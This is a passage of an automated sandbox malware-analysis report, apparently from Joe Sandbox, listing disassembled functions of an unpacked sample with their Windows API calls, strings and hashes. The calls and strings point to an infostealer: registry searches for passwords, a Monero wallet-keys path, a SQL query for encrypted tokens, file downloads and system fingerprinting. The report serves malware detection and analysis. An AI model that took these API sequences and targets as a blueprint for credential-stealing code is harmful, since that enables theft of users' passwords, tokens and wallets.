                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                    • String ID: :
                                    • API String ID: 3191641157-3653984579
                                    • Opcode ID: 677fdfa3b470d61204f2baceefb6cdad8e85f10cb3fd17617b79460da8a5c0a9
                                    • Instruction ID: fd1d8de8a0d17569764f0871819d0fe360e7d1cd5d56ec7bff19bcafefe700e0
                                    • Opcode Fuzzy Hash: 677fdfa3b470d61204f2baceefb6cdad8e85f10cb3fd17617b79460da8a5c0a9
                                    • Instruction Fuzzy Hash: C93150B1910109DFCB18EBE5DC9ADFF7374BB84302F184128F516B7290DA34A98ADB52
                                    Function 00C372D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 00C37314
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00C3733A
                                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00C373B1
                                    • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00C3740D
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00C37452
                                    • HeapFree.KERNEL32(00000000), ref: 00C37459
                                    • task.LIBCPMTD ref: 00C37555
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$EnumFreeOpenProcessValuememsettask
                                    • String ID: Password
                                    • API String ID: 2808661185-3434357891
                                    • Opcode ID: 9728c9a5ffc86faca335009bca6ce4d049e1857b64864f081d0afe2775fcbdf8
                                    • Instruction ID: 756f05378c85ebf78d3230cf521e63f6e00fb8d53770a5fe5f47f8627688b06a
                                    • Opcode Fuzzy Hash: 9728c9a5ffc86faca335009bca6ce4d049e1857b64864f081d0afe2775fcbdf8
                                    • Instruction Fuzzy Hash: E6614CB591426C9BDB24DB50CC45BDAB7B8BF48300F0481E9E689A6141DFB06FC9DFA1
                                    Function 00C48100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,019DDE68,00000000,?,00C50E2C,00000000,?,00000000), ref: 00C48130
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C48137
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00C48158
                                    • __aulldiv.LIBCMT ref: 00C48172
                                    • __aulldiv.LIBCMT ref: 00C48180
                                    • wsprintfA.USER32 ref: 00C481AC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                    • String ID: %d MB$@
                                    • API String ID: 2774356765-3474575989
                                    • Opcode ID: 9efbcb82c332ea1edb9d289069a7886c1e77ac5c81817d5c1ef1ea3cef47be72
                                    • Instruction ID: b26e331c527d6f9934d28da6c6bbf4ce3c8b60836d57779488e19202c3acbed1
                                    • Opcode Fuzzy Hash: 9efbcb82c332ea1edb9d289069a7886c1e77ac5c81817d5c1ef1ea3cef47be72
                                    • Instruction Fuzzy Hash: 9A214AB1E44208ABDB00DFD5CC49FAEB7B8FB44B00F104219F605BB280C77869058BA5
                                    Function 00C360A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                      • Part of subcall function 00C347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C34839
                                      • Part of subcall function 00C347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C34849
                                    • InternetOpenA.WININET(00C50DF7,00000001,00000000,00000000,00000000), ref: 00C3610F
                                    • StrCmpCA.SHLWAPI(?,019DE580), ref: 00C36147
                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00C3618F
                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00C361B3
                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 00C361DC
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00C3620A
                                    • CloseHandle.KERNEL32(?,?,00000400), ref: 00C36249
                                    • InternetCloseHandle.WININET(?), ref: 00C36253
                                    • InternetCloseHandle.WININET(00000000), ref: 00C36260
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2507841554-0
                                    • Opcode ID: 2092ae5410f79a95e8d1959e21641dcf64d7530abc59464741640a31aaa6a88f
                                    • Instruction ID: 4eb638dcbab83ef26619851c053c695037dca09495b3b33779b1afb116db84ea
                                    • Opcode Fuzzy Hash: 2092ae5410f79a95e8d1959e21641dcf64d7530abc59464741640a31aaa6a88f
                                    • Instruction Fuzzy Hash: 40518FB0950208AFEB24DF51DC45BEE77B8FB44301F1080A8E609A71C0DB756A89CF95
                                    Function 00C3BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                      • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                      • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                    • lstrlen.KERNEL32(00000000), ref: 00C3BC9F
                                      • Part of subcall function 00C48E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C48E52
                                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 00C3BCCD
                                    • lstrlen.KERNEL32(00000000), ref: 00C3BDA5
                                    • lstrlen.KERNEL32(00000000), ref: 00C3BDB9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                    • API String ID: 3073930149-1079375795
                                    • Opcode ID: 7dd8e1aad46adcf93f802b40c801bf3595c9a510896917afc7d12bffa92b0566
                                    • Instruction ID: ee958e5fee5be4dec0e7576e7452f46e6ca6b9cf104d9aae9c8d32594da74d03
                                    • Opcode Fuzzy Hash: 7dd8e1aad46adcf93f802b40c801bf3595c9a510896917afc7d12bffa92b0566
                                    • Instruction Fuzzy Hash: BCB14172950108ABEB14FBA0DD96EEE7338FF54304F444568F506B6092EF346E49DBA2
                                    Function 00C46770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess$DefaultLangUser
                                    • String ID: *
                                    • API String ID: 1494266314-163128923
                                    • Opcode ID: a798eef28ea36acac72eb6263fcc36ecbcc78d658a14db500af3b36bfb92d211
                                    • Instruction ID: 36d45ec60bf6565c869d677236bdda0ebc08d8ea0ee37e08f34b2b38c0b06608
                                    • Opcode Fuzzy Hash: a798eef28ea36acac72eb6263fcc36ecbcc78d658a14db500af3b36bfb92d211
                                    • Instruction Fuzzy Hash: 10F05E30904209EFD348DFE2E90972C7BB0FB45703F0801AAE60DA6290D7744B82DB97
                                    Function 00C34FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00C34FCA
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C34FD1
                                    • InternetOpenA.WININET(00C50DDF,00000000,00000000,00000000,00000000), ref: 00C34FEA
                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00C35011
                                    • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00C35041
                                    • InternetCloseHandle.WININET(?), ref: 00C350B9
                                    • InternetCloseHandle.WININET(?), ref: 00C350C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                    • String ID:
                                    • API String ID: 3066467675-0
                                    • Opcode ID: b88de252240d585c45fd11258412f87ac3b5e7abf6d405a52b2c26b4afc03a66
                                    • Instruction ID: 313fa77ad49dfc6d5eba49198f363628dea91c2d0914fb246f4f6c2d2e5b36a2
                                    • Opcode Fuzzy Hash: b88de252240d585c45fd11258412f87ac3b5e7abf6d405a52b2c26b4afc03a66
                                    • Instruction Fuzzy Hash: 7131F5B4A40218ABDB24CF55DC85BDDB7B8FB48704F1081E9EA09B7281D7706AC58F99
                                    Function 00C483DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00C48426
                                    • wsprintfA.USER32 ref: 00C48459
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00C4847B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00C4848C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00C48499
                                      • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                    • RegQueryValueExA.ADVAPI32(00000000,019DDFB8,00000000,000F003F,?,00000400), ref: 00C484EC
                                    • lstrlen.KERNEL32(?), ref: 00C48501
                                    • RegQueryValueExA.ADVAPI32(00000000,019DDEE0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00C50B34), ref: 00C48599
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00C48608
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00C4861A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 3896182533-4073750446
                                    • Opcode ID: 3e4c7e5d87ced2a1042668bddd2ac24e4e58ef30c56f4adbf2846f272d1ad2c0
                                    • Instruction ID: 9823a43bce2bd91a81506328f1d926e1780fa482bee368e097246b3c40bf866e
                                    • Opcode Fuzzy Hash: 3e4c7e5d87ced2a1042668bddd2ac24e4e58ef30c56f4adbf2846f272d1ad2c0
                                    • Instruction Fuzzy Hash: B5210A719002189FDB64DB54DC85FE9B3B8FB48700F04C1A8E609A6180DF716AC9CFD5
                                    Function 00C47690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C476A4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C476AB
                                    • RegOpenKeyExA.ADVAPI32(80000002,019CB8C0,00000000,00020119,00000000), ref: 00C476DD
                                    • RegQueryValueExA.ADVAPI32(00000000,019DDF58,00000000,00000000,?,000000FF), ref: 00C476FE
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00C47708
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: Windows 11
                                    • API String ID: 3225020163-2517555085
                                    • Opcode ID: f3dc009c368efd62b825e729980adc737047c58ff353db2ff5181bbc76cbe969
                                    • Instruction ID: a110b61d471dee19dffd231d9fa031bf373940aae3c8c09fcb47d471dd02277e
                                    • Opcode Fuzzy Hash: f3dc009c368efd62b825e729980adc737047c58ff353db2ff5181bbc76cbe969
                                    • Instruction Fuzzy Hash: 1B01A7B4A00204BFEB04DBE1DC4DF6D77B8EB84701F144164FA08E7291D77099488B52
                                    Function 00C47720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C47734
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C4773B
                                    • RegOpenKeyExA.ADVAPI32(80000002,019CB8C0,00000000,00020119,00C476B9), ref: 00C4775B
                                    • RegQueryValueExA.ADVAPI32(00C476B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00C4777A
                                    • RegCloseKey.ADVAPI32(00C476B9), ref: 00C47784
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
